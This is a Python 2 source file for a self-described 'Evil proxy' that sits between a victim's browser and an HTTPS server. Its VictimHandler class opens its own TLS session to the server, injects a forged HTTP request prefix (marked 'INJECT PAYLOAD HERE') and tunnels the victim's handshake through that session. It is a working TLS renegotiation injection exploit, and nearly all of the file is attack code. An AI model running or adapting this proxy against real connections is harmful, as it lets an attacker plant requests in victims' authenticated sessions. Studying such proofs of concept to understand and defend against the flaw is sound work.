import struct
import socket
import threading
import sys
import optparse
import select
import urlparse


from tlslite.api                import *
from tlslite.messages           import *
from tlslite.constants          import *
from tlslite.utils.codec        import *
from tlslite.tlsrecordlayer     import *

BUFLEN = 8192

DEBUG = True

def dump(message, data):
    data = bytearray(data)
    print "\n" + message + '='*(47-len(message))
    i = 0
    if (len(data) > 16):
        for i in range(0, len(data)/16):
            print " ".join("%02x" % x for x in data[i*16:(i + 1)*16])
        print " ".join("%02x" % x for x in data[(i + 1)*16:])
    else:
        print " ".join("%02x" % x for x in data)
    print "="*47 + "\n"
   

# ================================
# = Wrapper for threading.Thread =
# ================================

class StoppableThread(threading.Thread):
    def __init__(self, target, args):
        self._stop = threading.Event()
        args += (self._stop, )
        super(StoppableThread, self).__init__(target=target, args=args)
        
    def stop(self):
        self._stop.set()

    def stopped(self):
        return self._stop.isSet()


# ======================
# = Connection handler =
# ======================

class ConnectionHandler:
    def __init__(self, thread_id, client, address, stop_event):

        client.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
        self.client = client
        self.thread_id = thread_id
        self.stop_event = stop_event
        self.client_buffer = ''


        print "Thread %d handled connection from %s:%d" % (thread_id, address[0], address[1])

        # Read first line of client request
        header = self.read_client_request_header()

        if header:

            print header
            # Parse that line
            self.method, self.host, self.path, \
                self.port, self.protocol, self.scheme = self.parse_header(header)

            # Connect to server
            self.connect_host()

            # Forward traffic
            if self.scheme == "http":
                self.forward()
            else:
                VictimHandler(self)

        # Release resourses
        self.release()

        

    def read_client_request_header(self):
        while not self.stop_event.is_set():  
            # Wait for file                                                             
            read, write, error = select.select([self.client],[],[],1.0)
            if error: 
                print "Error while reading line"
                break
            if read:
                self.client_buffer += self.client.recv(BUFLEN)
                end = self.client_buffer.find("\n")
                if end != 1:
                    break
        header = self.client_buffer[:end+1]
        self.client_buffer = self.client_buffer[end+1:]
        return header


    def parse_header(self, header):
        method, target, protocol = header.split()
        if method == "CONNECT":
            host, port = target.split(':')
            path = ""
            scheme = "https"
        else:
            port = 80
            parsed_url = urlparse.urlparse(target)
            host = parsed_url.netloc
            path = parsed_url.path
            scheme = "http"
        return method, host, path, port, protocol, scheme 

    def connect_host(self):
        try:
            # Get server ip
            (socket_family, _, _, _, address) = socket.getaddrinfo(self.host, self.port)[0]
            # Create server socket
            self.server = socket.socket(socket_family)
            self.server.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
            # Connect to server
            self.server.connect(address)
        except socket.error, ex:
            print ex

        if self.scheme == "http":
            header = "%s %s %s\n" % (self.method, self.path, self.protocol)
            self.server.send(header + self.client_buffer)
        elif self.scheme == "https":
            self.client.send("HTTP/1.1 200 Connection established\n" 
                + "Proxy-agent: Evil proxy\n\n")


    def forward(self):
        sockets = [self.client, self.server]

        # Forward loop
        while not self.stop_event.is_set():
            read, write, error = select.select(sockets, [], sockets, 1.0)
            if error: 
                print "Error while forwarding"
                break
            if read:
                for socket in read:
                    data = socket.recv(BUFLEN)
                    if data:
                        if socket is self.client:
                            self.server.send(data)
                        else:
                            self.client.send(data)

    def release(self):
        try:
            # Client
            self.client.close()

            # Server
            if hasattr(self, 'server'): 
                self.server.close()

        except socket.error, ex:
            print ex

        print 'Thread %d was stopped' % (self.thread_id)


# ===================
# = Message wrapper =
# ===================

class MessageWrapper(object):
    def __init__(self, version = (3, 1), ssl2 = False):
        self.contentType = ContentType.handshake
        self.ssl2 = ssl2
        self.client_version = version
 
    def setType(self, type):
        self.contentType = type
 
    def addBytes(self, bytes):
        self.bytes = bytes
 
    def write(self, trial=False):
        if trial:
            raise Exception('Unsupported')
        return bytearray(self.bytes)

# ==================
# = Victim handler =
# ==================

class VictimHandler:

    def __init__(self, connection_handler):

        self.connection = connection_handler


        # Recieve original client hello
        
        msg_type, tls_major, tls_minor, msg_len, client_hello_msg = self.recv_msg('client')
        tls_version = (tls_minor, tls_major)

        if DEBUG:
            dump("Original client hello", client_hello_msg)
        

        # Establsh ssl connection to target server
        if DEBUG:
            print "Establish ssl connection to target server..."

        self.server_ssl = TLSConnection(self.connection.server)
        self.server_ssl.handshakeClientCert()

        if DEBUG:
            print "Connection established"

    
        # INJECT PAYLOAD HERE!!!
        self.server_ssl.write("GET /page2.html HTTP/1.1\nContent-Length: 32\nDummy header:");

        # Send original client helllo over encrypted channel
        if DEBUG:
            print "Send original hello"
        self.send_to_server_encrypted(ContentType.handshake, client_hello_msg, tls_version)

        # =====================================================
        # Forward messages from server until server hello done
        # =====================================================

        if DEBUG:
            print "Start recieving messages from server"
        server_hello_done = False
        while not server_hello_done:
            msg_type, tls_major, tls_minor, msg_len, msg_enc = self.recv_msg('server')
            if msg_enc:
                msg = self.decrypt_msg_from_server(msg_type, msg_enc)
    
                self.send_msg('client', msg_type, msg, (tls_major, tls_minor))
                if msg[0] == HandshakeType.server_hello_done:
                    server_hello_done = True
            else:
                if DEBUG:
                    print 'Receive from server failed'
                return
      
        if DEBUG:
            print "Server hello done"

       
        # =============================
        # Forward messages from client 
        # =============================

        # Client key exchange
        msg_type, tls_major, tls_minor, msg_len, client_key_exchange_msg = self.recv_msg('client')
        if DEBUG:
            dump("Client key exchange", client_key_exchange_msg)
        self.send_to_server_encrypted(ContentType.handshake, client_key_exchange_msg, (tls_major, tls_minor))

        # =========
        # Finalize
        # =========

        # Client change_cipher_spec
        msg_type, tls_major, tls_minor, msg_len, client_change_cipher_spec = self.recv_msg('client')
        if DEBUG:
            dump("Client change cipher spec", client_change_cipher_spec)
        self.send_to_server_encrypted(ContentType.change_cipher_spec, client_change_cipher_spec, (tls_major, tls_minor))

        # Client finished
        msg_type, tls_major, tls_minor, msg_len, client_finished = self.recv_msg('client')
        if DEBUG:
            dump("Client finished", client_finished)
        self.send_msg('server', msg_type, client_finished, (tls_major, tls_minor))

        # Server change chipher spec
        msg_type, tls_major, tls_minor, msg_len, server_change_cipher_spec_enc = self.recv_msg('server')
        server_change_cipher_spec = self.decrypt_msg_from_server(msg_type, server_change_cipher_spec_enc)
        if DEBUG:
            dump("Server change cipher spec", server_change_cipher_spec)
        self.send_msg('client', msg_type, server_change_cipher_spec, (tls_major, tls_minor))

        # Server finished
        msg_type, tls_major, tls_minor, msg_len, server_finished = self.recv_msg('server')
        if DEBUG:
            dump("Server finished", server_finished)
        self.send_msg('client', msg_type, server_finished, (tls_major, tls_minor))

        self.connection.forward()



        
    def send_to_server_encrypted(self, msg_type, msg, tls_version):
        message = MessageWrapper(tls_version)
        message.addBytes(struct.unpack('B'*len(msg), msg))
        message.setType(msg_type)
        for result in self.server_ssl._sendMsg(message, True):
            pass

    def decrypt_msg_from_server(self, record_type, record):
        for result in self.server_ssl._decryptRecord(record_type, record):
            pass
        return result

    def recv_msg(self, target):
        # Choose right socket
        if target == "client":
            socket = self.connection.client
        else:
            socket = self.connection.server

        header = socket.recv(5)
        msg_type, tls_major, tls_minor, msg_len = struct.unpack("!BBBH", header)
        msg = socket.recv(msg_len)
        return msg_type, tls_major, tls_minor, msg_len, msg

    def send_msg(self, target, msg_type, msg, tls_version):
        # Choose right socket
        if target == "client":
            socket = self.connection.client
        else:
            socket = self.connection.server

        temp = struct.pack('!BBBH', msg_type, tls_version[0], tls_version[1], len(msg))
        temp += msg
        socket.send(temp)

    


# ===================
# = Message wrapper =
# ===================

class MessageWrapper(object):
    def __init__(self, version = (3, 1), ssl2 = False):
        self.contentType = ContentType.handshake
        self.ssl2 = ssl2
        self.client_version = version
 
    def setType(self, type):
        self.contentType = type
 
    def addBytes(self, bytes):
        self.bytes = bytes
 
    def write(self, trial=False):
        if trial:
            raise Exception('Unsupported')
        return bytearray(self.bytes)




if __name__ == '__main__':

    # Options
    parser = optparse.OptionParser()
    parser.add_option('-p', '--port', dest='listen_port', help='listen port', metavar='PORT', type='int', default=8080)
    
    # Parse options
    (options, args) = parser.parse_args()

    # Check options
    if not options.listen_port:
        parser.print_help()
        sys.exit(1)


    # Create listen socket
    try:
        listen_sock = socket.socket(socket.AF_INET)
        listen_sock.bind(('localhost', options.listen_port))
        print "Listening on port %u..." % (options.listen_port)
    except socket.error, ex:
        print "Error code %u, %s" % (ex[0], ex[1])
        sys.exit(1)
 
    listen_sock.listen(0)
 
  
    # Wait for connections 
    connections = []
    thread_id = 0
    while True:
        try:
            # Handle connection
            args = (thread_id, ) + listen_sock.accept()

            # Create new thread that will handle connection
            thread = StoppableThread(target=ConnectionHandler, args=args)
            thread.start()
            connections.append(thread)
            thread_id += 1
 
        except KeyboardInterrupt, ex:
            print "Aborted by user, exiting..."

            # Stop all threads
            for thread in connections:
                thread.stop()

            listen_sock.close()
            sys.exit(1)